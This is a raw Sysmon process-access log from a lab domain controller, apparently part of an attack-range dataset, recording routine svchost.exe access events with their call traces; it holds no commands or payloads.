13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4754-6000-1A05-000000009A01}28844184C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 